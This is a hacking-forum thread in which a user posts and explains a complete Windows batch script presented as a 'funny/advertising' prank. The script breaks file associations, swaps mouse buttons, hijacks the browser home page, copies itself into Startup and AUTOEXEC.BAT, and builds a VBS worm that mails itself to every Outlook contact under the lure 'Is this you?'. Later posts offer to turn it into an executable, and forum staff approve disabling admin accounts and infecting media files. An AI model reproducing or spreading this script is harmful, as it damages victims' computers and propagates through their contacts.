Animosity Gamerz
Please Register to the site, to see all the awesome hacks, videos, mods, and much more

Once registered you will be able to see the chatbox, to type and see what other members are typing

Regards Admins
Animosity Gamerz
Please Register to the site, to see all the awesome hacks, videos, mods, and much more

Once registered you will be able to see the chatbox, to type and see what other members are typing

Regards Admins
Animosity Gamerz
Would you like to react to this message? Create an account in a few clicks or log in to continue.


The online revolution revolves around us.
 
HomeHomeSearchLatest imagesRegisterLog in
Navigation
 Home
 Forum
 Memberlist
 Profile
 FAQ
 Search
Statistics
We have 44 registered users
The newest registered user is -Anony-

Our users have posted a total of 400 messages in 89 subjects
Search
 
 

Display results as :
 
Rechercher Advanced Search

 

 Funny/advertising batch

Go down 
3 posters

Should I post more dangerous things?
Yeah, I wanna know how crash the computer, give the blue screen of death, and delete all the files.
Funny/advertising batch I_vote_lcap0%Funny/advertising batch I_vote_rcap
 0% [ 0 ]
Sort of, I do wanna know how to infect plenty of other files
Funny/advertising batch I_vote_lcap100%Funny/advertising batch I_vote_rcap
 100% [ 2 ]
No, keep it clean
Funny/advertising batch I_vote_lcap0%Funny/advertising batch I_vote_rcap
 0% [ 0 ]
Total Votes : 2
 

AuthorMessage
TheBlueLobstar
Test Moderator
Coder
Test Moderator   Coder



Posts : 41
Points : 5243
Reputation : 4
Join date : 2010-03-02

Funny/advertising batch Empty
PostSubject: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 7:44 am

OK so heres the code

Code:

@ echo off



assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile

assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile


RUNDLL32 USER32.DLL,SwapMouseButton

time 12:00



reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.animosity.gamerz.net"



start http://www.animosity.gamerz.net



echo dim x>>%SystemDrive%\mail.vbs
echo on error resume next>>%SystemDrive%\mail.vbs
echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
echo Set Mail=ci>>%SystemDrive%\mail.vbs
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs
echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs
echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
echo Mail.send>>%SystemDrive%\mail.vbs
echo Next>>%SystemDrive%\mail.vbs
echo ol.Quit>>%SystemDrive%\mail.vbs
start "" "%SystemDrive%\mail.vbs"



copy %0 "%userprofile%\Start Menu\Programs\Startup"



echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT





Now i'm going to break it up and tell you what it does.

Code:

assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile

assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile


ok lol this is pretty funny it makes the computer think all .dll's are txt's ect ect
the biggest change you'll notice is the icons.

Code:

RUNDLL32 USER32.DLL,SwapMouseButton
this swaps the mouse buttons therefore confusing the victim for a couple of secconds.

Code:

time 12:00
this simply resets the time

Code:

reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.animosity.gamerz.net"
This is where the advertising comes in it changes the homepage to this website

Code:

start http://www.animosity.gamerz.net
this opens up the website

Code:

echo dim x>>%SystemDrive%\mail.vbs
echo on error resume next>>%SystemDrive%\mail.vbs
echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
echo Set Mail=ci>>%SystemDrive%\mail.vbs
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs
echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs
echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
echo Mail.send>>%SystemDrive%\mail.vbs
echo Next>>%SystemDrive%\mail.vbs
echo ol.Quit>>%SystemDrive%\mail.vbs
start "" "%SystemDrive%\mail.vbs"
This sends the file to everyone on outlook's contact list

Code:

copy %0 "%userprofile%\Start Menu\Programs\Startup"



echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
these two lines run the bat whenever the computer is started
Back to top Go down
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5451
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 7:53 am

hmm nice way to spam, by getting on ppls computers and sending it to there contacts lol
Back to top Go down
http://www.animositygamerz.forumotion.net
TheBlueLobstar
Test Moderator
Coder
Test Moderator   Coder



Posts : 41
Points : 5243
Reputation : 4
Join date : 2010-03-02

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 7:54 am

lol i could make it into an executable if you wanted
Back to top Go down
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5451
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 8:02 am

well considering it goe thru files to send other ppl stuff, u cant cuz ud be banned, srry

nd for the poll

-Only upload notepad scripts as long as they dont completely destroy the computer like real blue screen of death, deletion of system32,
Back to top Go down
http://www.animositygamerz.forumotion.net
TheBlueLobstar
Test Moderator
Coder
Test Moderator   Coder



Posts : 41
Points : 5243
Reputation : 4
Join date : 2010-03-02

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 8:06 am

oh ok so what are my limits like is Killing The AV to far or can i just disable it, can i disable admin? and can i infect like all mp3's mp4's txt files exes ect ect you and other admins should make some specific rules so i dont get myself into trouble.
Back to top Go down
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5451
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 8:08 am

TheBlueLobstar wrote:
oh ok so what are my limits like is Killing The AV to far or can i just disable it, can i disable admin? and can i infect like all mp3's mp4's txt files exes ect ect you and other admins should make some specific rules so i dont get myself into trouble.

wats AV?
disable admin - ok
infect MP3 & MP4 - ok
Back to top Go down
http://www.animositygamerz.forumotion.net
TheBlueLobstar
Test Moderator
Coder
Test Moderator   Coder



Posts : 41
Points : 5243
Reputation : 4
Join date : 2010-03-02

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 8:20 am

AV = Anti-Virus
Back to top Go down
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5451
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 8:24 am

killing and disabling Anti-Virus is too far
Back to top Go down
http://www.animositygamerz.forumotion.net
Velocity
Admin
Admin
Velocity


Posts : 118
Points : 15387
Reputation : 5
Join date : 2010-01-04
Age : 29
Location : Australia

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 9:27 am

MR-Final wrote:
killing and disabling Anti-Virus is too far

Just a tad Razz

Disabling things is OK, just things that would annoy people Smile

Haha, i like what you posted very nice XD
Back to top Go down
https://animositygamerz.forumotion.net
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5451
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeFri Mar 05, 2010 8:01 pm

put it as disabled for a min, i dont want ppl complaining they got it from this site and now there AV oesnt work, we could get in major trouble
Back to top Go down
http://www.animositygamerz.forumotion.net
Velocity
Admin
Admin
Velocity


Posts : 118
Points : 15387
Reputation : 5
Join date : 2010-01-04
Age : 29
Location : Australia

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeSat Mar 06, 2010 4:52 am

Yeah i agree cody. But, their fault for downloading it Very Happy
Back to top Go down
https://animositygamerz.forumotion.net
MR-Final
Uber Moderator
Uber Moderator
MR-Final


Posts : 157
Points : 5451
Reputation : 4
Join date : 2010-01-17
Age : 28
Location : United Staes

Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitimeSat Mar 06, 2010 7:28 am

that is true, but since this is a hack site, hacks can get thru computers to transfer/ do anything the hacker wants...if they got it from here, they could lie about coming here automaticaly updates a file on there PC to do anything

--Im just sayin, Lol
Back to top Go down
http://www.animositygamerz.forumotion.net
Sponsored content





Funny/advertising batch Empty
PostSubject: Re: Funny/advertising batch   Funny/advertising batch I_icon_minitime

Back to top Go down
 
Funny/advertising batch
Back to top 
Page 1 of 1
 Similar topics
-
» Batch stuff
» Advertising

Permissions in this forum:You cannot reply to topics in this forum
Animosity Gamerz :: Hacking :: Notepad scripts-
Jump to: